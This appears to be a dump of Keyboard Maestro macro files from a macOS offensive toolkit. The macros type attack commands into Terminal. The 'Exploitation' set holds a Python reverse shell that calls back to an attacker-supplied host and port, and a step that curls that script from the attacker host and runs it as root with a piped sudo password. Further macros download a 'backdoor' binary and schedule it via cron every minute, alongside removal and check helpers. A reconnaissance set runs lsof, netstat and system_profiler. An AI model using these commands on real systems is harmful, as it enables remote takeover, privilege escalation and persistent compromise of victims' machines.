KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 78 | ModificationDate 79 | 603480219.14996004 80 | Name 81 | Root escalation sudo exploit 82 | Triggers 83 | 84 | 85 | MacroTriggerType 86 | StatusMenu 87 | 88 | 89 | UID 90 | 53134B9F-C39A-40D1-BF36-885285CA4A23 91 | 92 | 93 | Name 94 | Exploitation 95 | Targeting 96 | 97 | Targeting 98 | Included 99 | TargetingApps 100 | 101 | 102 | BundleIdentifier 103 | com.apple.Terminal 104 | Name 105 | Terminal 106 | NewFile 107 | /System/Applications/Utilities/Terminal.app 108 | 109 | 110 | BundleIdentifier 111 | com.googlecode.iterm2 112 | Name 113 | iTerm 114 | NewFile 115 | /Applications/iTerm.app 116 | 117 | 118 | 119 | ToggleMacroUID 120 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 121 | UID 122 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 123 | 124 | 125 | Activate 126 | Normal 127 | CreationDate 128 | 603140665.49842894 129 | CustomIconData 130 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 131 | Macros 132 | 133 | 134 | Actions 135 | 136 | 137 | Buttons 138 | 139 | 140 | Button 141 | OK 142 | 143 | 144 | Button 145 | Cancel 146 | Cancel 147 | 148 | 149 | 150 | MacroActionType 151 | PromptForUserInput 152 | Prompt 153 | Please enter your local IP and the remote password 154 | TimeOutAbortsMacro 155 | 156 | Title 157 | Information 158 | Variables 159 | 160 | 161 | Default 162 | %Variable%LHOST% 163 | Variable 164 | LHOST 165 | 166 | 167 | Default 168 | 169 | Variable 170 | PASSWORD 171 | 172 | 173 | 174 | 175 | Action 176 | ByPasting 177 | MacroActionType 178 | InsertText 179 | Text 180 | cd /tmp/ && curl http://%Variable%LHOST%/reverse_tcp.py > python.py && echo %Variable%PASSWORD% | sudo -S python python.py 181 | 182 | 183 | IsDisclosed 184 | 185 | KeyCode 186 | 36 187 | MacroActionType 188 | SimulateKeystroke 189 | Modifiers 190 | 0 191 | ReleaseAll 192 | 193 | TargetApplication 194 | 195 | TargetingType 196 | Front 197 | 198 | 199 | CreationDate 200 | 603139824.59357095 201 | CustomIconData 202 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 203 | ModificationDate 204 | 603480203.42079794 205 | Name 206 | Root escalation from password 207 | Triggers 208 | 209 | 210 | MacroTriggerType 211 | StatusMenu 212 | 213 | 214 | UID 215 | 059ACF71-78DD-4479-8568-98F88AF68FE6 216 | 217 | 218 | Name 219 | Exploitation 220 | Targeting 221 | 222 | Targeting 223 | Included 224 | TargetingApps 225 | 226 | 227 | BundleIdentifier 228 | com.apple.Terminal 229 | Name 230 | Terminal 231 | NewFile 232 | /System/Applications/Utilities/Terminal.app 233 | 234 | 235 | BundleIdentifier 236 | com.googlecode.iterm2 237 | Name 238 | iTerm 239 | NewFile 240 | /Applications/iTerm.app 241 | 242 | 243 | 244 | ToggleMacroUID 245 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 246 | UID 247 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 248 | 249 | 250 | Activate 251 | Normal 252 | CreationDate 253 | 603140665.49842894 254 | CustomIconData 255 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 256 | Macros 257 | 258 | 259 | Actions 260 | 261 | 262 | Action 263 | ByPasting 264 | MacroActionType 265 | InsertText 266 | Text 267 | cp ~/.bash_profile.old ~/.bash_profile && rm ~/.bash_profile.old 268 | 269 | 270 | IsDisclosed 271 | 272 | KeyCode 273 | 36 274 | MacroActionType 275 | SimulateKeystroke 276 | Modifiers 277 | 0 278 | ReleaseAll 279 | 280 | TargetApplication 281 | 282 | TargetingType 283 | Front 284 | 285 | 286 | CreationDate 287 | 603139824.59357095 288 | CustomIconData 289 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 290 | ModificationDate 291 | 603257897.47791803 292 | Name 293 | Remove sudo exploit 294 | Triggers 295 | 296 | 297 | MacroTriggerType 298 | StatusMenu 299 | 300 | 301 | UID 302 | 992DBEAE-F388-4EDF-B1DD-80ABDB64CF9D 303 | 304 | 305 | Name 306 | Exploitation 307 | Targeting 308 | 309 | Targeting 310 | Included 311 | TargetingApps 312 | 313 | 314 | BundleIdentifier 315 | com.apple.Terminal 316 | Name 317 | Terminal 318 | NewFile 319 | /System/Applications/Utilities/Terminal.app 320 | 321 | 322 | BundleIdentifier 323 | com.googlecode.iterm2 324 | Name 325 | iTerm 326 | NewFile 327 | /Applications/iTerm.app 328 | 329 | 330 | 331 | ToggleMacroUID 332 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 333 | UID 334 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 335 | 336 | 337 | Activate 338 | Normal 339 | CreationDate 340 | 603140665.49842894 341 | CustomIconData 342 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 343 | Macros 344 | 345 | 346 | Actions 347 | 348 | 349 | Action 350 | ByPasting 351 | MacroActionType 352 | InsertText 353 | Text 354 | rm /users/shared/db 355 | 356 | 357 | IsDisclosed 358 | 359 | KeyCode 360 | 36 361 | MacroActionType 362 | SimulateKeystroke 363 | Modifiers 364 | 0 365 | ReleaseAll 366 | 367 | TargetApplication 368 | 369 | TargetingType 370 | Front 371 | 372 | 373 | MacroActionType 374 | Pause 375 | Time 376 | 0.5 377 | TimeOutAbortsMacro 378 | 379 | 380 | 381 | Action 382 | ByPasting 383 | MacroActionType 384 | InsertText 385 | Text 386 | echo "" > cron; crontab cron && rm cron 387 | 388 | 389 | IsDisclosed 390 | 391 | KeyCode 392 | 36 393 | MacroActionType 394 | SimulateKeystroke 395 | Modifiers 396 | 0 397 | ReleaseAll 398 | 399 | TargetApplication 400 | 401 | TargetingType 402 | Front 403 | 404 | 405 | CreationDate 406 | 603158737.91990697 407 | CustomIconData 408 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 409 | ModificationDate 410 | 604396901.01719797 411 | Name 412 | Remove backdoor (user) 413 | Triggers 414 | 415 | 416 | MacroTriggerType 417 | StatusMenu 418 | 419 | 420 | UID 421 | 738A2B44-19A4-4A68-B35D-847EAD42CFFD 422 | 423 | 424 | Name 425 | Exploitation 426 | Targeting 427 | 428 | Targeting 429 | Included 430 | TargetingApps 431 | 432 | 433 | BundleIdentifier 434 | com.apple.Terminal 435 | Name 436 | Terminal 437 | NewFile 438 | /System/Applications/Utilities/Terminal.app 439 | 440 | 441 | BundleIdentifier 442 | com.googlecode.iterm2 443 | Name 444 | iTerm 445 | NewFile 446 | /Applications/iTerm.app 447 | 448 | 449 | 450 | ToggleMacroUID 451 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 452 | UID 453 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 454 | 455 | 456 | Activate 457 | Normal 458 | CreationDate 459 | 603140665.49842894 460 | CustomIconData 461 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 462 | Macros 463 | 464 | 465 | Actions 466 | 467 | 468 | Action 469 | ByPasting 470 | MacroActionType 471 | InsertText 472 | Text 473 | ls /etc/ | grep db 474 | 475 | 476 | IsDisclosed 477 | 478 | KeyCode 479 | 36 480 | MacroActionType 481 | SimulateKeystroke 482 | Modifiers 483 | 0 484 | ReleaseAll 485 | 486 | TargetApplication 487 | 488 | TargetingType 489 | Front 490 | 491 | 492 | MacroActionType 493 | Pause 494 | Time 495 | 1 496 | TimeOutAbortsMacro 497 | 498 | 499 | 500 | Action 501 | ByPasting 502 | MacroActionType 503 | InsertText 504 | Text 505 | ls /users/shared/ | grep db 506 | 507 | 508 | IsDisclosed 509 | 510 | KeyCode 511 | 36 512 | MacroActionType 513 | SimulateKeystroke 514 | Modifiers 515 | 0 516 | ReleaseAll 517 | 518 | TargetApplication 519 | 520 | TargetingType 521 | Front 522 | 523 | 524 | MacroActionType 525 | Pause 526 | Time 527 | 1 528 | TimeOutAbortsMacro 529 | 530 | 531 | 532 | Action 533 | ByPasting 534 | MacroActionType 535 | InsertText 536 | Text 537 | env EDITOR=nano crontab -l 538 | 539 | 540 | IsDisclosed 541 | 542 | KeyCode 543 | 36 544 | MacroActionType 545 | SimulateKeystroke 546 | Modifiers 547 | 0 548 | ReleaseAll 549 | 550 | TargetApplication 551 | 552 | TargetingType 553 | Front 554 | 555 | 556 | CreationDate 557 | 603158737.91990697 558 | CustomIconData 559 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 560 | ModificationDate 561 | 604378250.17346704 562 | Name 563 | Check backdoor 564 | Triggers 565 | 566 | 567 | MacroTriggerType 568 | StatusMenu 569 | 570 | 571 | UID 572 | 643C1B7F-5788-4FA5-B23B-D42378C2E366 573 | 574 | 575 | Name 576 | Exploitation 577 | Targeting 578 | 579 | Targeting 580 | Included 581 | TargetingApps 582 | 583 | 584 | BundleIdentifier 585 | com.apple.Terminal 586 | Name 587 | Terminal 588 | NewFile 589 | /System/Applications/Utilities/Terminal.app 590 | 591 | 592 | BundleIdentifier 593 | com.googlecode.iterm2 594 | Name 595 | iTerm 596 | NewFile 597 | /Applications/iTerm.app 598 | 599 | 600 | 601 | ToggleMacroUID 602 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 603 | UID 604 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 605 | 606 | 607 | Activate 608 | Normal 609 | CreationDate 610 | 603140665.49842894 611 | CustomIconData 612 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 613 | Macros 614 | 615 | 616 | Actions 617 | 618 | 619 | Buttons 620 | 621 | 622 | Button 623 | OK 624 | 625 | 626 | Button 627 | Cancel 628 | Cancel 629 | 630 | 631 | 632 | MacroActionType 633 | PromptForUserInput 634 | Prompt 635 | Please enter your local IP and the username of the session. 636 | TimeOutAbortsMacro 637 | 638 | Title 639 | Information 640 | Variables 641 | 642 | 643 | Default 644 | %Variable%LHOST% 645 | Variable 646 | LHOST 647 | 648 | 649 | 650 | 651 | Action 652 | ByPasting 653 | MacroActionType 654 | InsertText 655 | Text 656 | curl http://%Variable%LHOST%/backdoor > /users/shared/db; chmod 777 /users/shared/db 657 | 658 | 659 | IsDisclosed 660 | 661 | KeyCode 662 | 36 663 | MacroActionType 664 | SimulateKeystroke 665 | Modifiers 666 | 0 667 | ReleaseAll 668 | 669 | TargetApplication 670 | 671 | TargetingType 672 | Front 673 | 674 | 675 | MacroActionType 676 | Pause 677 | Time 678 | 0.5 679 | TimeOutAbortsMacro 680 | 681 | 682 | 683 | Action 684 | ByPasting 685 | MacroActionType 686 | InsertText 687 | Text 688 | echo "* * * * * /users/shared/db" > /tmp/cron; crontab /tmp/cron; rm /tmp/cron 689 | 690 | 691 | IsDisclosed 692 | 693 | KeyCode 694 | 36 695 | MacroActionType 696 | SimulateKeystroke 697 | Modifiers 698 | 0 699 | ReleaseAll 700 | 701 | TargetApplication 702 | 703 | TargetingType 704 | Front 705 | 706 | 707 | CreationDate 708 | 603158737.91990697 709 | CustomIconData 710 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 711 | ModificationDate 712 | 604396259.66541398 713 | Name 714 | Install backdoor (user) 715 | Triggers 716 | 717 | 718 | MacroTriggerType 719 | StatusMenu 720 | 721 | 722 | UID 723 | 5A610A68-1124-48A8-A6E6-31CD4B1919AF 724 | 725 | 726 | Name 727 | Exploitation 728 | Targeting 729 | 730 | Targeting 731 | Included 732 | TargetingApps 733 | 734 | 735 | BundleIdentifier 736 | com.apple.Terminal 737 | Name 738 | Terminal 739 | NewFile 740 | /System/Applications/Utilities/Terminal.app 741 | 742 | 743 | BundleIdentifier 744 | com.googlecode.iterm2 745 | Name 746 | iTerm 747 | NewFile 748 | /Applications/iTerm.app 749 | 750 | 751 | 752 | ToggleMacroUID 753 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 754 | UID 755 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 756 | 757 | 758 | Activate 759 | Normal 760 | CreationDate 761 | 603140665.49842894 762 | CustomIconData 763 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 764 | Macros 765 | 766 | 767 | Actions 768 | 769 | 770 | Buttons 771 | 772 | 773 | Button 774 | OK 775 | 776 | 777 | Button 778 | Cancel 779 | Cancel 780 | 781 | 782 | 783 | MacroActionType 784 | PromptForUserInput 785 | Prompt 786 | Please enter your local IP 787 | TimeOutAbortsMacro 788 | 789 | Title 790 | Information 791 | Variables 792 | 793 | 794 | Default 795 | %Variable%LHOST% 796 | Variable 797 | LHOST 798 | 799 | 800 | 801 | 802 | Action 803 | ByPasting 804 | MacroActionType 805 | InsertText 806 | Text 807 | curl http://%Variable%LHOST%/backdoor > /etc/db && chmod 777 /etc/db 808 | 809 | 810 | IsDisclosed 811 | 812 | KeyCode 813 | 36 814 | MacroActionType 815 | SimulateKeystroke 816 | Modifiers 817 | 0 818 | ReleaseAll 819 | 820 | TargetApplication 821 | 822 | TargetingType 823 | Front 824 | 825 | 826 | MacroActionType 827 | Pause 828 | Time 829 | 0.5 830 | TimeOutAbortsMacro 831 | 832 | 833 | 834 | Action 835 | ByPasting 836 | MacroActionType 837 | InsertText 838 | Text 839 | echo "* * * * * /etc/db" > /tmp/cron && crontab /tmp/cron && rm /tmp/cron 840 | 841 | 842 | IsDisclosed 843 | 844 | KeyCode 845 | 36 846 | MacroActionType 847 | SimulateKeystroke 848 | Modifiers 849 | 0 850 | ReleaseAll 851 | 852 | TargetApplication 853 | 854 | TargetingType 855 | Front 856 | 857 | 858 | CreationDate 859 | 603158737.91990697 860 | CustomIconData 861 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 862 | ModificationDate 863 | 604389717.57555997 864 | Name 865 | Install backdoor (root) 866 | Triggers 867 | 868 | 869 | MacroTriggerType 870 | StatusMenu 871 | 872 | 873 | UID 874 | 6763136A-6EF7-41B6-9EC0-00D1DDE9F611 875 | 876 | 877 | Name 878 | Exploitation 879 | Targeting 880 | 881 | Targeting 882 | Included 883 | TargetingApps 884 | 885 | 886 | BundleIdentifier 887 | com.apple.Terminal 888 | Name 889 | Terminal 890 | NewFile 891 | /System/Applications/Utilities/Terminal.app 892 | 893 | 894 | BundleIdentifier 895 | com.googlecode.iterm2 896 | Name 897 | iTerm 898 | NewFile 899 | /Applications/iTerm.app 900 | 901 | 902 | 903 | ToggleMacroUID 904 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 905 | UID 906 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 907 | 908 | 909 | Activate 910 | Normal 911 | CreationDate 912 | 603140665.49842894 913 | CustomIconData 914 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 915 | Macros 916 | 917 | 918 | Actions 919 | 920 | 921 | Buttons 922 | 923 | 924 | Button 925 | OK 926 | 927 | 928 | Button 929 | Cancel 930 | Cancel 931 | 932 | 933 | 934 | MacroActionType 935 | PromptForUserInput 936 | Prompt 937 | Please enter the details of these variables. The NetCat payload will be created and moved to your web server file, this action requires root privileges. 938 | TimeOutAbortsMacro 939 | 940 | Title 941 | Create netcat payload 942 | Variables 943 | 944 | 945 | Default 946 | %Variable%LHOST% 947 | Variable 948 | LHOST 949 | 950 | 951 | Default 952 | %Variable%LPORT% 953 | Variable 954 | LPORT 955 | 956 | 957 | 958 | 959 | Action 960 | ByPasting 961 | MacroActionType 962 | InsertText 963 | Text 964 | echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%Variable%LHOST%",%Variable%LPORT%));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /tmp/nc.py && sudo mv /tmp/nc.py /Library/WebServer/Documents/reverse_tcp.py 965 | 966 | 967 | IsDisclosed 968 | 969 | KeyCode 970 | 36 971 | MacroActionType 972 | SimulateKeystroke 973 | Modifiers 974 | 0 975 | ReleaseAll 976 | 977 | TargetApplication 978 | 979 | TargetingType 980 | Front 981 | 982 | 983 | CreationDate 984 | 603381955.08927703 985 | CustomIconData 986 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 987 | ModificationDate 988 | 604511837.59938502 989 | Name 990 | Create netcat payload (python) 991 | Triggers 992 | 993 | 994 | MacroTriggerType 995 | StatusMenu 996 | 997 | 998 | UID 999 | 2F27C92B-8EAA-4B36-8047-467326DF79A9 1000 | 1001 | 1002 | Name 1003 | Exploitation 1004 | Targeting 1005 | 1006 | Targeting 1007 | Included 1008 | TargetingApps 1009 | 1010 | 1011 | BundleIdentifier 1012 | com.apple.Terminal 1013 | Name 1014 | Terminal 1015 | NewFile 1016 | /System/Applications/Utilities/Terminal.app 1017 | 1018 | 1019 | BundleIdentifier 1020 | com.googlecode.iterm2 1021 | Name 1022 | iTerm 1023 | NewFile 1024 | /Applications/iTerm.app 1025 | 1026 | 1027 | 1028 | ToggleMacroUID 1029 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 1030 | UID 1031 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 1032 | 1033 | 1034 | Activate 1035 | Normal 1036 | CreationDate 1037 | 603140665.49842894 1038 | CustomIconData 1039 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 1040 | Macros 1041 | 1042 | 1043 | Actions 1044 | 1045 | 1046 | Action 1047 | ByPasting 1048 | MacroActionType 1049 | InsertText 1050 | Text 1051 | rm /etc/db 1052 | 1053 | 1054 | IsDisclosed 1055 | 1056 | KeyCode 1057 | 36 1058 | MacroActionType 1059 | SimulateKeystroke 1060 | Modifiers 1061 | 0 1062 | ReleaseAll 1063 | 1064 | TargetApplication 1065 | 1066 | TargetingType 1067 | Front 1068 | 1069 | 1070 | MacroActionType 1071 | Pause 1072 | Time 1073 | 0.5 1074 | TimeOutAbortsMacro 1075 | 1076 | 1077 | 1078 | Action 1079 | ByPasting 1080 | MacroActionType 1081 | InsertText 1082 | Text 1083 | echo "" > cron && crontab cron && rm cron 1084 | 1085 | 1086 | IsDisclosed 1087 | 1088 | KeyCode 1089 | 36 1090 | MacroActionType 1091 | SimulateKeystroke 1092 | Modifiers 1093 | 0 1094 | ReleaseAll 1095 | 1096 | TargetApplication 1097 | 1098 | TargetingType 1099 | Front 1100 | 1101 | 1102 | CreationDate 1103 | 603158737.91990697 1104 | CustomIconData 1105 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 1106 | ModificationDate 1107 | 604396914.692276 1108 | Name 1109 | Remove backdoor (root) 1110 | Triggers 1111 | 1112 | 1113 | MacroTriggerType 1114 | StatusMenu 1115 | 1116 | 1117 | UID 1118 | AC3FA36A-D13D-4C85-8AA8-6441581D0EAC 1119 | 1120 | 1121 | Name 1122 | Exploitation 1123 | Targeting 1124 | 1125 | Targeting 1126 | Included 1127 | TargetingApps 1128 | 1129 | 1130 | BundleIdentifier 1131 | com.apple.Terminal 1132 | Name 1133 | Terminal 1134 | NewFile 1135 | /System/Applications/Utilities/Terminal.app 1136 | 1137 | 1138 | BundleIdentifier 1139 | com.googlecode.iterm2 1140 | Name 1141 | iTerm 1142 | NewFile 1143 | /Applications/iTerm.app 1144 | 1145 | 1146 | 1147 | ToggleMacroUID 1148 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2 1149 | UID 1150 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D 1151 | 1152 | 1153 | 1154 | -------------------------------------------------------------------------------- /ressources/macros/Information gathering Macros.kmmacros: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Activate 7 | Normal 8 | CreationDate 9 | 603207196.43601894 10 | CustomIconData 11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 12 | Macros 13 | 14 | 15 | Actions 16 | 17 | 18 | Buttons 19 | 20 | 21 | Button 22 | OK 23 | 24 | 25 | Button 26 | Cancel 27 | Cancel 28 | 29 | 30 | 31 | MacroActionType 32 | PromptForUserInput 33 | Prompt 34 | Enter a port number if you want to filter the results: 35 | TimeOutAbortsMacro 36 | 37 | Title 38 | Open PORTS (passive) 39 | Variables 40 | 41 | 42 | Default 43 | 44 | Variable 45 | PORT 46 | 47 | 48 | 49 | 50 | Conditions 51 | 52 | ConditionList 53 | 54 | 55 | ConditionType 56 | Variable 57 | Variable 58 | PORT 59 | VariableConditionType 60 | IsNotEmpty 61 | VariableValue 62 | value 63 | 64 | 65 | ConditionListMatch 66 | All 67 | 68 | ElseActions 69 | 70 | 71 | Action 72 | ByPasting 73 | MacroActionType 74 | InsertText 75 | Text 76 | lsof -i -P -n 77 | 78 | 79 | MacroActionType 80 | IfThenElse 81 | ThenActions 82 | 83 | 84 | Action 85 | ByPasting 86 | MacroActionType 87 | InsertText 88 | Text 89 | lsof -i -P -n | grep %Variable%PORT% 90 | 91 | 92 | TimeOutAbortsMacro 93 | 94 | 95 | 96 | IsDisclosed 97 | 98 | KeyCode 99 | 36 100 | MacroActionType 101 | SimulateKeystroke 102 | Modifiers 103 | 0 104 | ReleaseAll 105 | 106 | TargetApplication 107 | 108 | TargetingType 109 | Front 110 | 111 | 112 | CreationDate 113 | 603207220.833902 114 | CustomIconData 115 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 116 | ModificationDate 117 | 603384863.16840506 118 | Name 119 | Open PORTS (passive) 120 | Triggers 121 | 122 | 123 | MacroTriggerType 124 | StatusMenu 125 | 126 | 127 | UID 128 | 6CFC12AB-2997-490E-882D-2C92E13D8AE1 129 | 130 | 131 | Name 132 | Information gathering 133 | Targeting 134 | 135 | Targeting 136 | Included 137 | TargetingApps 138 | 139 | 140 | BundleIdentifier 141 | com.apple.Terminal 142 | Name 143 | Terminal 144 | NewFile 145 | /System/Applications/Utilities/Terminal.app 146 | 147 | 148 | BundleIdentifier 149 | com.googlecode.iterm2 150 | Name 151 | iTerm 152 | NewFile 153 | /Applications/iTerm.app 154 | 155 | 156 | 157 | ToggleMacroUID 158 | 38E2E2BB-5898-4929-A43E-8913B5596750 159 | UID 160 | EFD562F2-5884-4E9D-A278-1CB94FE88046 161 | 162 | 163 | Activate 164 | Normal 165 | CreationDate 166 | 603207196.43601894 167 | CustomIconData 168 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 169 | Macros 170 | 171 | 172 | Actions 173 | 174 | 175 | Action 176 | ByPasting 177 | MacroActionType 178 | InsertText 179 | Text 180 | /usr/sbin/networksetup -getwebproxy "Wi-Fi" 181 | 182 | 183 | IsDisclosed 184 | 185 | KeyCode 186 | 36 187 | MacroActionType 188 | SimulateKeystroke 189 | Modifiers 190 | 0 191 | ReleaseAll 192 | 193 | TargetApplication 194 | 195 | TargetingType 196 | Front 197 | 198 | 199 | Action 200 | ByPasting 201 | MacroActionType 202 | InsertText 203 | Text 204 | /usr/sbin/networksetup -getsecurewebproxy "Wi-Fi" 205 | 206 | 207 | IsDisclosed 208 | 209 | KeyCode 210 | 36 211 | MacroActionType 212 | SimulateKeystroke 213 | Modifiers 214 | 0 215 | ReleaseAll 216 | 217 | TargetApplication 218 | 219 | TargetingType 220 | Front 221 | 222 | 223 | CreationDate 224 | 603156967.88335896 225 | CustomIconData 226 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 227 | ModificationDate 228 | 605198315.53079796 229 | Name 230 | Proxies status 231 | Triggers 232 | 233 | 234 | MacroTriggerType 235 | StatusMenu 236 | 237 | 238 | UID 239 | 6917188F-A583-415A-AFAC-9A790308B910 240 | 241 | 242 | Name 243 | Information gathering 244 | Targeting 245 | 246 | Targeting 247 | Included 248 | TargetingApps 249 | 250 | 251 | BundleIdentifier 252 | com.apple.Terminal 253 | Name 254 | Terminal 255 | NewFile 256 | /System/Applications/Utilities/Terminal.app 257 | 258 | 259 | BundleIdentifier 260 | com.googlecode.iterm2 261 | Name 262 | iTerm 263 | NewFile 264 | /Applications/iTerm.app 265 | 266 | 267 | 268 | ToggleMacroUID 269 | 38E2E2BB-5898-4929-A43E-8913B5596750 270 | UID 271 | EFD562F2-5884-4E9D-A278-1CB94FE88046 272 | 273 | 274 | Activate 275 | Normal 276 | CreationDate 277 | 603207196.43601894 278 | CustomIconData 279 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 280 | Macros 281 | 282 | 283 | Actions 284 | 285 | 286 | Action 287 | ByPasting 288 | MacroActionType 289 | InsertText 290 | Text 291 | netstat -nr 292 | 293 | 294 | IsDisclosed 295 | 296 | KeyCode 297 | 36 298 | MacroActionType 299 | SimulateKeystroke 300 | Modifiers 301 | 0 302 | ReleaseAll 303 | 304 | TargetApplication 305 | 306 | TargetingType 307 | Front 308 | 309 | 310 | CreationDate 311 | 603207220.833902 312 | CustomIconData 313 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 314 | ModificationDate 315 | 604334224.28068697 316 | Name 317 | Netstat 318 | Triggers 319 | 320 | 321 | MacroTriggerType 322 | StatusMenu 323 | 324 | 325 | UID 326 | 67BE2462-D191-4B2A-801D-A232D1E2AD1C 327 | 328 | 329 | Name 330 | Information gathering 331 | Targeting 332 | 333 | Targeting 334 | Included 335 | TargetingApps 336 | 337 | 338 | BundleIdentifier 339 | com.apple.Terminal 340 | Name 341 | Terminal 342 | NewFile 343 | /System/Applications/Utilities/Terminal.app 344 | 345 | 346 | BundleIdentifier 347 | com.googlecode.iterm2 348 | Name 349 | iTerm 350 | NewFile 351 | /Applications/iTerm.app 352 | 353 | 354 | 355 | ToggleMacroUID 356 | 38E2E2BB-5898-4929-A43E-8913B5596750 357 | UID 358 | EFD562F2-5884-4E9D-A278-1CB94FE88046 359 | 360 | 361 | Activate 362 | Normal 363 | CreationDate 364 | 603207196.43601894 365 | CustomIconData 366 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 367 | Macros 368 | 369 | 370 | Actions 371 | 372 | 373 | Buttons 374 | 375 | 376 | Button 377 | OK 378 | 379 | 380 | Button 381 | List filters 382 | Cancel 383 | 384 | 385 | 386 | Button 387 | Cancel 388 | Cancel 389 | 390 | 391 | 392 | MacroActionType 393 | PromptForUserInput 394 | Prompt 395 | If no filter is applied, the script will use the default settings. 396 | TimeOutAbortsMacro 397 | 398 | Title 399 | System profiler 400 | Variables 401 | 402 | 403 | Default 404 | None|system_profiler SPParallelATADataTypeSPParallelATADataType|SPUniversalAccessDataType|SPSecureElementDataType|SPApplicationsDataType|SPAudioDataType|SPBluetoothDataType|SPCameraDataType|SPCardReaderDataType|SPiBridgeDataType|SPDeveloperToolsDataType|SPDiagnosticsDataType|SPDisabledSoftwareDataType|SPDiscBurningDataType|SPEthernetDataType|SPExtensionsDataType|SPFibreChannelDataType|SPFireWireDataType|SPFirewallDataType|SPFontsDataType|SPFrameworksDataType|SPDisplaysDataType|SPHardwareDataType|SPInstallHistoryDataType|SPInternationalDataType|SPLegacySoftwareDataType|SPNetworkLocationDataType|SPLogsDataType|SPManagedClientDataType|SPMemoryDataType|SPNVMeDataType|SPNetworkDataType|SPPCIDataType|SPParallelSCSIDataType|SPPowerDataType|SPPrefPaneDataType|SPPrintersSoftwareDataType|SPPrintersDataType|SPConfigurationProfileDataType|SPRawCameraDataType|SPSASDataType|SPSerialATADataType|SPSPIDataType|SPSmartCardsDataType|SPSoftwareDataType|SPStartupItemDataType|SPStorageDataType|SPSyncServicesDataType|SPThunderboltDataType|SPUSBDataType|SPNetworkVolumeDataType|SPWWANDataType|SPAirPortDataType 405 | Variable 406 | filter 407 | 408 | 409 | 410 | 411 | Conditions 412 | 413 | ConditionList 414 | 415 | 416 | ConditionType 417 | Variable 418 | Variable 419 | Result Button 420 | VariableConditionType 421 | Is 422 | VariableValue 423 | OK 424 | 425 | 426 | ConditionListMatch 427 | All 428 | 429 | ElseActions 430 | 431 | 432 | Action 433 | ByPasting 434 | MacroActionType 435 | InsertText 436 | Text 437 | system_profiler -listDataTypes 438 | 439 | 440 | MacroActionType 441 | IfThenElse 442 | ThenActions 443 | 444 | 445 | Conditions 446 | 447 | ConditionList 448 | 449 | 450 | ConditionType 451 | Variable 452 | Variable 453 | filter 454 | VariableConditionType 455 | DoesNotContain 456 | VariableValue 457 | none 458 | 459 | 460 | ConditionListMatch 461 | All 462 | 463 | ElseActions 464 | 465 | 466 | Action 467 | ByPasting 468 | MacroActionType 469 | InsertText 470 | Text 471 | system_profiler SPSoftwareDataType SPNetworkDataType 472 | 473 | 474 | MacroActionType 475 | IfThenElse 476 | ThenActions 477 | 478 | 479 | Action 480 | ByPasting 481 | MacroActionType 482 | InsertText 483 | Text 484 | system_profiler %Variable%filter% 485 | 486 | 487 | TimeOutAbortsMacro 488 | 489 | 490 | 491 | TimeOutAbortsMacro 492 | 493 | 494 | 495 | IsDisclosed 496 | 497 | KeyCode 498 | 36 499 | MacroActionType 500 | SimulateKeystroke 501 | Modifiers 502 | 0 503 | ReleaseAll 504 | 505 | TargetApplication 506 | 507 | TargetingType 508 | Front 509 | 510 | 511 | CreationDate 512 | 603207220.833902 513 | CustomIconData 514 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 515 | ModificationDate 516 | 603239911.771299 517 | Name 518 | System profiler 519 | Triggers 520 | 521 | 522 | MacroTriggerType 523 | StatusMenu 524 | 525 | 526 | UID 527 | 84FB38A1-5A0A-40ED-9207-A7FFF5BC0F7F 528 | 529 | 530 | Name 531 | Information gathering 532 | Targeting 533 | 534 | Targeting 535 | Included 536 | TargetingApps 537 | 538 | 539 | BundleIdentifier 540 | com.apple.Terminal 541 | Name 542 | Terminal 543 | NewFile 544 | /System/Applications/Utilities/Terminal.app 545 | 546 | 547 | BundleIdentifier 548 | com.googlecode.iterm2 549 | Name 550 | iTerm 551 | NewFile 552 | /Applications/iTerm.app 553 | 554 | 555 | 556 | ToggleMacroUID 557 | 